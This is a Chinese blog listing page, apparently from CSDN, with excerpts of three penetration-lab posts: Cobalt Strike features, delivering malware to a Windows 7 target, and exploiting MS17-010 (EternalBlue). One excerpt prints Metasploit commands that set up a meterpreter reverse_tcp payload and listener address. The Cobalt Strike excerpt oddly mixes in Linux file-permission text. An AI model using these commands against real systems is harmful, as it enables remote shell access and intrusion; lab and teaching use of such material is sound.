- 博客(3)
- 收藏
- 关注
原创 Cpbalt Strike上线
它是一款基于java的渗透测试神器,Cobalt Strike集成了端口转发、扫描多模式端口Listener、Windows exe程序生成、Windows dll动态链接库生成、java程序生成、office宏代码生成,包括站点克隆获取浏览器的相关信息等。文件或目录的权限位是由9个权限位来控制,每三位为一组,它们分别是文件所有者(User)的读、写、执行,用户组(Group)的读、写、执行以及其它用户(Other)的读、写、执行。所有者的权限用数字表达:属主的那三个权限位的数字加起来的总和。
2025-03-07 17:17:25
647
原创 PC端恶意程序利用
msf exploit(multi/handler) >set payload windows/meterpreter/reverse_tcp #设置payload。要将 恶意软件传送到靶机上有多种方法,上次实验利用永恒之蓝将截屏下载到了靶机上,借此可通过永恒之蓝将恶意软件从攻击机(kali)发送到靶机(windows7)上。msf exploit(multi/handler) >set lhost 192.168.110.195 #设置kali的ip。
2025-03-05 14:38:25
543
原创 ms17-010(永恒之蓝)渗透实战
永恒之蓝是著名的操作系统漏洞,SMB Server远程代码执行漏洞,Microsoft Server Message Block 1.0 (SMBv1)服务器处理某些请求时,在实现上存在远程代码执行漏洞,成功利用后可使攻击者在目标服务器上执行任意代码。永恒之蓝是在Windows的SMB服务处理SMB v1 请求时发生的漏洞,这个漏洞导致攻击者在目标系统上可以执行任意代码。
2025-03-04 15:00:38
620
空空如也
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人